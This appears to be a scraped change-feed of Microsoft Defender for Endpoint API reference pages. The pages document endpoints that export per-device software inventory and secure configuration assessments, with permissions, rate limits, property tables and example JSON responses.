-Status|String|**New** (for a new vulnerability introduced on a device). **Fixed** (for a vulnerability that doesn't exist anymore on the device, which means it was remediated). **Updated** (for a vulnerability on a device that has changed. The possible changes are: CVSS score, exploitability level, severity level, DiskPaths, RegistryPaths, RecommendedSecurityUpdate).
-VulnerabilitySeverityLevel|String|Severity level assigned to the security vulnerability based on the CVSS score.
-
-## 4. Export non product code software inventory assessment
-
-Returns all of the installed software that does not have a [Common Platform Enumeration(CPE)](https://nvd.nist.gov/products/cpe) and their details on each device.
-
-### 4.1 Methods
-
-|Method|Data type|Description|
-|:|:|:|
-|Export non product code software inventory assessment **(JSON response)**|Non product code software inventory by device collection. See: [4.2 Properties (JSON response)](#42-properties-json-response)|Returns a table with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion. The API pulls all data in your organization as JSON responses. This method is best for small organizations with less than 100-K devices. The response is paginated, so you can use the @odata.nextLink field from the response to fetch the next results. |
-| Export non product code software inventory assessment **(via files)**|Non product code software inventory by device files. See: [4.3 Properties (via files)](#43-properties-via-files)|Returns a table with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion. This API solution enables pulling larger amounts of data faster and more reliably. So, it's recommended for large organizations, with more than 100-K devices. This API pulls all data in your organization as download files. The response contains URLs to download all the data from Azure Storage. This API enables you to download data from Azure Storage as follows: <ol><li>Call the API to get a list of download URLs with your organization data</li><li>Download the files using the download URLs and process the data as you like.</li></ol> |
-
-### 4.2 Properties (JSON response)
-
-Property (ID)|Data type|Description
-:|:|:
-DeviceId|string|Unique identifier for the device in the service.
-DeviceName|string|Fully qualified domain name (FQDN) of the device.
-OSPlatform|string|Platform of the operating system running on the device. These are specific operating systems with variations within the same family, such as Windows 10 and Windows 11. See [Supported operating systems, platforms and capabilities](../../defender-vulnerability-management/tvm-supported-os.md) for details.
-RbacGroupName|string|The role-based access control (RBAC) group. If this device isn't assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."
-RbacGroupId|string|The role-based access control (RBAC) group ID.
-SoftwareLastSeenTimestamp|string|The last time this software was seen on the device.
-SoftwareName|string|Name of the software product.
-SoftwareVendor|string|Name of the software vendor.
-SoftwareVersion|string|Version number of the software product.
-
-### 4.3 Properties (via files)
-
-Property (ID)|Data type|Description
-:|:|:
-Export files|array\[string\]|A list of download URLs for files holding the current snapshot of the organization.
-GeneratedTime|String|The time that the export was generated.
-
-## See also
--- [Export secure configuration assessment per device](get-assessment-secure-config.md)-- [Export software inventory assessment per device](get-assessment-software-inventory.md)-- [Export software vulnerabilities assessment per device](get-assessment-software-vulnerabilities.md)-- [Export non cpe software inventory assessment per device](get-assessment-non-cpe-software-inventory.md)-
-Other related
--- [Microsoft Defender Vulnerability Management](../next-gen-threat-and-vuln-mgt.md)-- [Vulnerabilities in your organization](../tvm-weaknesses.md)
security Get Assessment Non Cpe Software Inventory https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-assessment-non-cpe-software-inventory.md
- Title: Export non product code software inventory assessment per device
-description: Returns a table with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion for software that doesn't have a Common Platform Enumeration (CPE)
------- m365-security-- tier3-- must-keep--- Previously updated : 05/27/2022--
-# Export non product code software inventory assessment per device
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-This API returns all the data for installed software that doesn't have a [Common Platform Enumeration(CPE)](https://nvd.nist.gov/products/cpe), on a per-device basis. The information returned by this API, along with the information returned by the [Export software inventory assessment](get-assessment-non-cpe-software-inventory.md) API, for software that does have a CPE, gives you full visibility into the software installed across your organization and the devices it's installed on.
-
-> [!NOTE]
-> Software products without a CPE are not supported by vulnerability management. They will be shown in the software inventory page, but because CPEs are used by vulnerability management to identify the software and any vulnerabilities, information like, exploits, number of exposed devices, and weaknesses won't be available for them. For more information, see [Software inventory](../../defender-vulnerability-management/tvm-software-inventory.md).
-
-Different API calls get different types of data. Because the amount of data can be large, there are two ways it can be retrieved:
--- [Export non product code software inventory assessment **JSON response**](#1-export-non-product-code-software-inventory-assessment-json-response) The API pulls all data in your organization as Json responses. This method is best for _small organizations with less than 100-K devices_. The response is paginated, so you can use the \@odata.nextLink field from the response to fetch the next results.--- [Export non product code software inventory assessment **via files**](#2-export-non-product-code-software-inventory-assessment-via-files) This API solution enables pulling larger amounts of data faster and more reliably. So, it's recommended for large organizations, with more than 100-K devices. This API pulls all data in your organization as download files. The response contains URLs to download all the data from Azure Storage. This API enables you to download all your data from Azure Storage as follows:
- - Call the API to get a list of download URLs with all your organization data.
- - Download all the files using the download URLs and process the data as you like.
-
-Data that is collected (using either _Json response_ or _via files_) is the current snapshot of the current state. It doesn't contain historic data. To collect historic data, customers must save the data in their own data storages.
-
-> [!NOTE]
-> Unless indicated otherwise, all export assessment methods listed are **_full export_** and **_by device_** (also referred to as **_per device_**).
-
-## 1. Export non product code software inventory assessment (JSON response)
-
-### 1.1 API method description
-
-This API response contains all the data of installed software that does not have a [Common Platform Enumeration(CPE)](https://nvd.nist.gov/products/cpe) per device. Returns a table with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion.
-
-#### Limitations
--- Maximum page size is 200,000.-- Rate limitations for this API are 30 calls per minute and 1000 calls per hour.-
-### 1.2 Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs for details.](apis-intro.md)
-
-Permission type|Permission|Permission display name
-||
-Application|Software.Read.All|\'Read Threat and Vulnerability Management software information\'
-Delegated (work or school account)|Software.Read|\'Read Threat and Vulnerability Management software information\'
-
-### 1.3 URL
-
-```http
-GET /api/machines/SoftwareInventoryNoProductCodeByMachine
-```
-
-### 1.4 Parameters
--- pageSize (default = 50,000): Number of results in response.-- $top: Number of results to return (doesn't return @odata.nextLink and therefore doesn't pull all the data)-
-### 1.5 Properties
-
-> [!NOTE]
->
-> - Each record is approximately 0.5KB of data. You should take this into account when choosing the correct pageSize parameter for you.
-> - The properties defined in the following table are listed alphabetically, by property ID. When running this API, the resulting output will not necessarily be returned in the same order listed in this table.
-> - Some additional columns might be returned in the response. These columns are temporary and might be removed, please use only the documented columns.
-
-<br>
-
-Property (ID)|Data type|Description
-:|:|:
-DeviceId|string|Unique identifier for the device in the service.
-DeviceName|string|Fully qualified domain name (FQDN) of the device.
-OSPlatform|string|Platform of the operating system running on the device. These are specific operating systems with variations within the same family, such as Windows 10 and Windows 11. See [Supported operating systems, platforms and capabilities](../../defender-vulnerability-management/tvm-supported-os.md) for details.
-RbacGroupName|string|The role-based access control (RBAC) group. If this device is not assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."
-RbacGroupId|string|The role-based access control (RBAC) group ID.
-SoftwareLastSeenTimestamp|string|The last time this software was seen on the device.
-SoftwareName|string|Name of the software product.
-SoftwareVendor|string|Name of the software vendor.
-SoftwareVersion|string|Version number of the software product.
-
-### 1.6 Examples
-
-#### 1.6.1 Request example
-
-```http
-https://api.securitycenter.microsoft.com/api/machines/SoftwareInventoryNoProductCodeByMachine?pageSize=3 &sinceTime=2021-05-19
-```
-
-#### 1.6.2 Response example
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windowsDefenderATP.api.AssetNonCpeSoftware)",
- "value": [
- {
- "deviceId": "1234512345123451234512345",
- "rbacGroupId": 11,
- "rbacGroupName": "London",
- "deviceName": "Device1",
- "osPlatform": "Windows11",
- "softwareVendor": "microsoft",
- "softwareName": "vs_communitymsi",
- "softwareVersion": "11.11.31111.1",
- "softwareLastSeenTimestamp": "2021-01-30 11:31:12.271"
- },
- {
- "deviceId": "232323232323232322323232323",
- "rbacGroupId": 23,
- "rbacGroupName": "Tokyo",
- "deviceName": "Device23",
- "osPlatform": "Windows10",
- "softwareVendor": "intel",
- "softwareName": "intel®_software_installer",
- "softwareVersion": "22.20.2.2",
- "softwareLastSeenTimestamp": "2022-05-30 15:35:12.271"
- },
- {
- "deviceId": "6565656565",
- "rbacGroupId": 65,
- "rbacGroupName": "Center",
- "deviceName": "Device56",
- "osPlatform": "Windows10",
- "softwareVendor": "Lob Apps",
- "softwareName": "Headtrax",
- "softwareVersion": "60.273.3",
- "softwareLastSeenTimestamp": "2022-05-05 15:35:12.271"
- },
- ],
- "@odata.nextLink": "https://api.securitycenter.microsoft.com/api/machines/SoftwareInventoryNoProductCodeByMachine?pagesize=3%20%20&sincetime=2021-05-19&$skiptoken=eyJFeHBvcnREZWZpbml0aW9uIjp7IlRpbWVQYXRoIjoiMjAyMi0wNS0zMC8xMTAxLyJ9LCJFeHBvcnRGaWxlSW5kZXgiOjAsIkxpbmVTdG9wcGVkQXQiOjV9"
-}
-
-```
-
-## 2. Export non product code software inventory assessment (via files)
-
-### 2.1 API method description
-
-This API response contains all the data of installed software that does not have a [Common Platform Enumeration(CPE)](https://nvd.nist.gov/products/cpe) per device. Returns a table with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion.
-
-#### 2.1.1 Limitations
-
-Rate limitations for this API are 5 calls per minute and 20 calls per hour.
-
-### 2.2 Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs for details.](apis-intro.md)
-
-Permission type|Permission|Permission display name
-||
-Application|Software.Read.All|\'Read Threat and Vulnerability Management software information\'
-Delegated (work or school account)|Software.Read|\'Read Threat and Vulnerability Management software information\'
-
-### 2.3 URL
-
-```http
-GET /api/machines/SoftwareInventoryNonCpeExport
-```
-
-### Parameters
--- sasValidHours: The number of hours that the download URLs will be valid for (Maximum 24 hours)-
-### 2.5 Properties
-
-> [!NOTE]
->
-> - The files are gzip compressed & in multiline JSON format.
-> - The download URLs are only valid for 3 hours. Otherwise you can use the parameter.
-> - For maximum download speed of your data, you can make sure you are downloading from the same Azure region that your data resides.
-
-<br>
-
-****
-
-Property (ID)|Data type|Description|Example of a returned value
-:|:|:|:
-Export files|array\[string\]|A list of download URLs for files holding the current snapshot of the organization|"[Https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...1", "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...2"]
-GeneratedTime|string|The time that the export was generated.|2021-05-20T08:00:00Z
-|
-
-### 2.6 Examples
-
-#### 2.6.1 Request example
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machines/SoftwareInventoryNonCpeExport
-```
-
-#### 2.6.2 Response example
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#microsoft.windowsDefenderATP.api.ExportFilesResponse",
- "exportFiles": [
- "https://tvmexportexternalprdcanc.blob.core.windows.net/temp-ffd80447-7b3d-4ad2-b366-f0979b129662/2022-05-30/1101/NonCpeSoftwareInventory/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaa/_RbacGroupId=1/part-00337-5e15412b-5c85-4896-ac60-b7b3ab8da096.c000.json.gz?sv=2020-08-04&st=2022-05-30T13%3A41%3A59Z&se=2022-05-30T16%3A41%3A59Z&sr=b&sp=r&sig=aHnmuOKlIvpR0PsdamYfmCCDZ1nhpuXBzK2%2FkJ9xTpg%3D",
- "https://tvmexportexternalprdcanc.blob.core.windows.net/temp-ffd80447-7b3d-4ad2-b366-f0979b129662/2022-05-30/1101/NonCpeSoftwareInventory/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaa/_RbacGroupId=1/part-00338-5e15412b-5c85-4896-ac60-b7b3ab8da096.c000.json.gz?sv=2020-08-04&st=2022-05-30T13%3A41%3A59Z&se=2022-05-30T16%3A41%3A59Z&sr=b&sp=r&sig=0fQg%2Ft469x26KvPLmvctLl0g6DC38CNM3lXYi9dnFfo%3D",
- "https://tvmexportexternalprdcanc.blob.core.windows.net/temp-ffd80447-7b3d-4ad2-b366-f0979b129662/2022-05-30/1101/NonCpeSoftwareInventory/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaa/_RbacGroupId=1/part-00339-5e15412b-5c85-4896-ac60-b7b3ab8da096.c000.json.gz?sv=2020-08-04&st=2022-05-30T13%3A41%3A59Z&se=2022-05-30T16%3A41%3A59Z&sr=b&sp=r&sig=P6HGHoLXXipMauBpLueoQVrwHL7qmvLoCjcij6ERx8o%3D",
- "https://tvmexportexternalprdcanc.blob.core.windows.net/temp-ffd80447-7b3d-4ad2-b366-f0979b129662/2022-05-30/1101/NonCpeSoftwareInventory/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaa/_RbacGroupId=1/part-00340-5e15412b-5c85-4896-ac60-b7b3ab8da096.c000.json.gz?sv=2020-08-04&st=2022-05-30T13%3A41%3A59Z&se=2022-05-30T16%3A41%3A59Z&sr=b&sp=r&sig=VnpVct%2F8vdiIFTf2xXP9DF7ngWv1Zqew30q2jBPVghg%3D",
- "https://tvmexportexternalprdcanc.blob.core.windows.net/temp-ffd80447-7b3d-4ad2-b366-f0979b129662/2022-05-30/1101/NonCpeSoftwareInventory/json/OrgId=47d41a0c-188d-46d3-bbea-a93dbc0bfcaa/_RbacGroupId=1/part-00341-5e15412b-5c85-4896-ac60-b7b3ab8da096.c000.json.gz?sv=2020-08-04&st=2022-05-30T13%3A41%3A59Z&se=2022-05-30T16%3A41%3A59Z&sr=b&sp=r&sig=GY0zxMfEmr9v9fZBWYyKEtT2k%2F0ELQIlOP0ct%2B6SdGU%3D",
- ],
- "generatedTime": "2022-05-30T11:01:00Z"
-}
-```
-
-## See also
--- [Export software assessment per device](get-assessment-software-inventory.md)-- [Export assessment methods and properties per device](get-assessment-methods-properties.md)-- [Export secure configuration assessment per device](get-assessment-secure-config.md)-- [Export software vulnerabilities assessment per device](get-assessment-software-vulnerabilities.md)-
-Other related
-- [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt)-- [Vulnerabilities in your organization](../tvm-weaknesses.md)
security Get Assessment Secure Config https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-assessment-secure-config.md
- Title: Export secure configuration assessment per device
-description: Returns an entry for every unique combination of DeviceId, ConfigurationId.
------- m365-security-- tier3-- must-keep--- Previously updated : 06/04/2021--
-# Export secure configuration assessment per device
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Returns all of the configurations and their status, on a per-device basis.
-
-There are different API calls to get different types of data. Because the amount of data can be large, there are two ways it can be retrieved:
--- [Export secure configuration assessment **JSON response**](#1-export-secure-configuration-assessment-json-response): The API pulls all data in your organization as Json responses. This method is best for _small organizations with less than 100-K devices_. The response is paginated, so you can use the \@odata.nextLink field from the response to fetch the next results.--- [Export secure configuration assessment **via files**](#2-export-secure-configuration-assessment-via-files): This API solution enables pulling larger amounts of data faster and more reliably. Therefore, it is recommended for large organizations, with more than 100-K devices. This API pulls all data in your organization as download files. The response contains URLs to download all the data from Azure Storage. This API enables you to download all your data from Azure Storage as follows:-
- - Call the API to get a list of download URLs with all your organization data.
-
- - Download all the files using the download URLs and process the data as you like.
-
-Data that is collected (using either _JSON response_ or _via files_) is the current snapshot of the current state, and does not contain historic data. In order to collect historic data, customers must save the data in their own data storages.
-
-> [!NOTE]
-> Unless indicated otherwise, all export assessment methods listed are **_full export_** and **_by device_** (also referred to as **_per device_**).
-
-## 1. Export secure configuration assessment (JSON response)
-
-### 1.1 API method description
-
-This API response contains the Secure Configuration Assessment on your exposed devices, and returns an entry for every unique combination of DeviceId, ConfigurationId.
-
-#### 1.1.1 Limitations
--- Maximum page size is 200,000.--- Rate limitations for this API are 30 calls per minute and 1000 calls per hour.-
-### 1.2 Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md) for details.
-
-Permission type|Permission|Permission display name
-||
-Application|Vulnerability.Read.All|\'Read Threat and Vulnerability Management vulnerability information\'
-Delegated (work or school account)|Vulnerability.Read|\'Read Threat and Vulnerability Management vulnerability information\'
-
-### 1.3 URL
-
-```http
-GET /api/machines/SecureConfigurationsAssessmentByMachine
-```
-
-### 1.4 Parameters
--- pageSize \(default = 50,000\): Number of results in response.-- \$top: Number of results to return \(doesn't return \@odata.nextLink and therefore doesn't pull all the data\).-
-### 1.5 Properties
-
-> [!NOTE]
->
-> - The properties defined in the following table are listed alphabetically, by property ID. When running this API, the resulting output will not necessarily be returned in the same order listed in this table.
-> - Some additional columns might be returned in the response. These columns are temporary and might be removed, please use only the documented columns.
-
-<br>
-
-****
-
-Property (ID)|Data type|Description|Example of a returned value
-|||
-ConfigurationCategory|string|Category or grouping to which the configuration belongs: Application, OS, Network, Accounts, Security controls|Security controls
-ConfigurationId|string|Unique identifier for a specific configuration|scid-10000
-ConfigurationImpact|string|Rated impact of the configuration to the overall configuration score (1-10)|9
-ConfigurationName|string|Display name of the configuration|Onboard devices to Microsoft Defender for Endpoint
-ConfigurationSubcategory|string|Subcategory or subgrouping to which the configuration belongs. In many cases, this describes specific capabilities or features.|Onboard Devices
-DeviceId|string|Unique identifier for the device in the service.|9eaf3a8b5962e0e6b1af9ec756664a9b823df2d1
-DeviceName|string|Fully qualified domain name (FQDN) of the device.|johnlaptop.europe.contoso.com
-IsApplicable|bool|Indicates whether the configuration or policy is applicable|true
-IsCompliant|bool|Indicates whether the configuration or policy is properly configured|false
-IsExpectedUserImpact|bool|Indicates whether there will be user impact if the configuration will be applied|true
-OSPlatform|string|Platform of the operating system running on the device. This indicates specific operating systems, including variations within the same family, such as Windows 10 and Windows 11. See Microsoft Defender Vulnerability Management (MDVM) supported operating systems and platforms for details.|Windows10 and Windows 11
-RbacGroupName|string|The role-based access control (RBAC) group. If this device is not assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."|Servers
-RecommendationReference|string|A reference to the recommendation ID related to this software.|sca-_-scid-20000
-Timestamp|string|Last time the configuration was seen on the device|2020-11-03 10:13:34.8476880
-|
-
-### 1.6 Examples
-
-#### 1.6.1 Request example
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machines/SecureConfigurationsAssessmentByMachine?pageSize=5
-```
-
-#### 1.6.2 Response example
-
-```json
-{
- "@odata.context": "api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windowsDefenderATP.api.AssetConfiguration)",
- "value": [
- {
- "deviceId": "00013ee62c6b12345b10214e1801b217b50ab455c293d",
- "rbacGroupName": "hhh",
- "deviceName": "ComputerPII_5d96860d69c73fdd06fc8d1679e1eb73eceb8330",
- "osPlatform": "Windows10" "Windows11",
- "osVersion": "NT kernel 6.x",
- "timestamp": "2021-01-11 09:47:58.854",
- "configurationId": "scid-10000",
- "configurationCategory": "Network",
- "configurationSubcategory": "",
- "configurationImpact": 5,
- "isCompliant": true,
- "isApplicable": true,
- "isExpectedUserImpact": false,
- "configurationName": "Disable insecure administration protocol - Telnet",
- "recommendationReference": "sca-_-scid-10000"
- },
- {
- "deviceId": "0002a1be533813b9a8c6de739785365bce7910",
- "rbacGroupName": "hhh",
- "deviceName": null,
- "osPlatform": "Windows10" "Windows11",
- "osVersion": "10.0",
- "timestamp": "2021-01-11 09:47:58.854",
- "configurationId": "scid-20000",
- "configurationCategory": "Security controls",
- "configurationSubcategory": "Onboard Devices",
- "configurationImpact": 9,
- "isCompliant": false,
- "isApplicable": true,
- "isExpectedUserImpact": false,
- "configurationName": "Onboard devices to Microsoft Defender for Endpoint",
- "recommendationReference": "sca-_-scid-20000"
- },
- {
- "deviceId": "0002a1de123456a8c06de736785395d4ce7610",
- "rbacGroupName": "hhh",
- "deviceName": null,
- "osPlatform": "Windows10" "Windows11",
- "osVersion": "10.0",
- "timestamp": "2021-01-11 09:47:58.854",
- "configurationId": "scid-10000",
- "configurationCategory": "Network",
- "configurationSubcategory": "",
- "configurationImpact": 5,
- "isCompliant": true,
- "isApplicable": true,
- "isExpectedUserImpact": false,
- "configurationName": "Disable insecure administration protocol - Telnet",
- "recommendationReference": "sca-_-scid-10000"
- },
- {
- "deviceId": "00044f912345bdaf756492dbe6db733b6a9c59ab4",
- "rbacGroupName": "hhh",
- "deviceName": "ComputerPII_18663d45912eed224b2be2f5ea3142726e63f16a.DomainPII_21eeb80b086e76bdfa178eadfa25e8de9acfa346.corp.contoso.com",
- "osPlatform": "Windows10" "Windows11",
- "osVersion": "10.0.17763.1637",
- "timestamp": "2021-01-11 09:47:58.854",
- "configurationId": "scid-39",
- "configurationCategory": "OS",
- "configurationSubcategory": "",
- "configurationImpact": 5,
- "isCompliant": true,
- "isApplicable": true,
- "isExpectedUserImpact": false,
- "configurationName": "Enable 'Domain member: Digitally sign secure channel data (when possible)'",
- "recommendationReference": "sca-_-scid-39"
- },
- {
- "deviceId": "00044f912345daf759462bde6bd733d6a9c56ab4",
- "rbacGroupName": "hhh",
- "deviceName": "ComputerPII_18663b45612eeb224d2de2f5ea3142726e63f16a.DomainPII_21eed80d086e76dbfa178eadfa25e8be9acfa346.corp.contoso.com",
- "osPlatform": "Windows10" "Windows11",
- "osVersion": "10.0.17763.1637",
- "timestamp": "2021-01-11 09:47:58.854",
- "configurationId": "scid-6093",
- "configurationCategory": "Security controls",
- "configurationSubcategory": "Antivirus",
- "configurationImpact": 5,
- "isCompliant": false,
- "isApplicable": false,
- "isExpectedUserImpact": false,
- "configurationName": "Enable Microsoft Defender Antivirus real-time behavior monitoring for Linux",
- "recommendationReference": "sca-_-scid-6093"
- }
- ],
- "@odata.nextLink": "https://api.securitycenter.microsoft.com/api/machines/SecureConfigurationsAssessmentByMachine?pagesize=5&$skiptoken=eyJFeHBvcnREZWZpbml0aW9uIjp7IlRpbWVQYXRoIjoiMjAyMS0wMS0xMS8xMTAxLyJ9LCJFeHBvcnRGaWxlSW5kZXgiOjAsIkxpbmVTdG9wcGVkQXQiOjV9"
-}
-```
-
-## 2. Export secure configuration assessment (via files)
-
-### 2.1 API method description
-
-This API response contains the Secure Configuration Assessment on your exposed devices, and returns an entry for every unique combination of DeviceId, ConfigurationId.
-
-#### 2.1.1 Limitations
-
-Rate limitations for this API are 5 calls per minute and 20 calls per hour.
-
-### 2.2 Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs for details.](apis-intro.md)
-
-Permission type|Permission|Permission display name
-||
-Application|Vulnerability.Read.All|\'Read Threat and Vulnerability Management vulnerability information\'
-Delegated (work or school account)|Vulnerability.Read|\'Read Threat and Vulnerability Management vulnerability information\'
-
-### 2.3 URL
-
-```http
-GET /api/machines/SecureConfigurationsAssessmentExport
-```
-
-### Parameters
--- sasValidHours: The number of hours that the download URLs will be valid for (Maximum 24 hours).-
-### 2.5 Properties
-
-> [!NOTE]
->
-> - The files are gzip compressed & in multiline Json format.
-> - The download URLs are only valid for 3 hours; otherwise you can use the parameter.
-> - For maximum download speed of your data, you can make sure you are downloading from the same Azure region in which your data resides.
-
-<br>
-
-****
-
-Property (ID)|Data type|Description|Example of a returned value
-|||
-Export files|array\[string\]|A list of download URLs for files holding the current snapshot of the organization|["Https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...1", "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...2"]
-GeneratedTime|string|The time that the export was generated.|2021-05-20T08:00:00Z
-|
-
-### 2.6 Examples
-
-#### 2.6.1 Request example
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machines/SecureConfigurationsAssessmentExport
-```
-
-#### 2.6.2 Response example
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#contoso.windowsDefenderATP.api.ExportFilesResponse",
- "exportFiles": [
- "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/ScaExport/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00393-e423630d-4c69-4490-8769-a4f5468c4f25.c000.json.gz?sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=...",
- "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/ScaExport/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00394-e423630d-4c69-4490-8769-a4f5468c4f25.c000.json.gz?sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=...",
- "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/ScaExport/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00394-e423630d-4c69-4490-8769-a4f5468c4f25.c001.json.gz?sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=..."
- ],
- "generatedTime": "2021-01-11T11:01:00Z"
-}
-```
-
-## See also
--- [Export assessment methods and properties per device](get-assessment-methods-properties.md)-- [Export software inventory assessment per device](get-assessment-software-inventory.md)-- [Export software vulnerabilities assessment per device](get-assessment-software-vulnerabilities.md)-
-Other related
--- [Microsoft Defender Vulnerability Management](../next-gen-threat-and-vuln-mgt.md)-- [Vulnerabilities in your organization](../tvm-weaknesses.md)
security Get Assessment Software Inventory https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-assessment-software-inventory.md
- Title: Export software inventory assessment per device
-description: Returns a table with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion.
------- m365-security-- tier3-- must-keep--- Previously updated : 06/04/2021--
-# Export software inventory assessment per device
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-This API returns all the data for installed software that has a [Common Platform Enumeration(CPE)](https://nvd.nist.gov/products/cpe), on a per-device basis.
-
-Different API calls get different types of data. Because the amount of data can be large, there are two ways it can be retrieved:
--- [Export software inventory assessment **JSON response**](#1-export-software-inventory-assessment-json-response) The API pulls all data in your organization as Json responses. This method is best for _small organizations with less than 100-K devices_. The response is paginated, so you can use the \@odata.nextLink field from the response to fetch the next results.--- [Export software inventory assessment **via files**](#2-export-software-inventory-assessment-via-files) This API solution enables pulling larger amounts of data faster and more reliably. So, it's recommended for large organizations, with more than 100-K devices. This API pulls all data in your organization as download files. The response contains URLs to download all the data from Azure Storage. This API enables you to download all your data from Azure Storage as follows:
- - Call the API to get a list of download URLs with all your organization data.
- - Download all the files using the download URLs and process the data as you like.
-
-Data that is collected (using either _Json response_ or _via files_) is the current snapshot of the current state. It doesn't contain historic data. To collect historic data, customers must save the data in their own data storages.
-
-> [!NOTE]
-> Unless indicated otherwise, all export assessment methods listed are **_full export_** and **_by device_** (also referred to as **_per device_**).
-
-## 1. Export software inventory assessment (JSON response)
-
-### 1.1 API method description
-
-This API response contains all the data of installed software that has a [Common Platform Enumeration(CPE)](https://nvd.nist.gov/products/cpe), per device. Returns a table with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion.
-
-#### 1.1.1 Limitations
--- Maximum page size is 200,000.-- Rate limitations for this API are 30 calls per minute and 1000 calls per hour.-
-### 1.2 Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs for details.](apis-intro.md)
-
-Permission type|Permission|Permission display name
-||
-Application|Software.Read.All|\'Read Threat and Vulnerability Management software information\'
-Delegated (work or school account)|Software.Read|\'Read Threat and Vulnerability Management software information\'
-
-### 1.3 URL
-
-```http
-GET /api/machines/SoftwareInventoryByMachine
-```
-
-### 1.4 Parameters
--- pageSize (default = 50,000): Number of results in response.-- $top: Number of results to return (doesn't return @odata.nextLink and therefore doesn't pull all the data)-
-### 1.5 Properties
-
-> [!NOTE]
->
-> - Each record is approximately 0.5KB of data. You should take this into account when choosing the correct pageSize parameter for you.
-> - The properties defined in the following table are listed alphabetically, by property ID. When running this API, the resulting output will not necessarily be returned in the same order listed in this table.
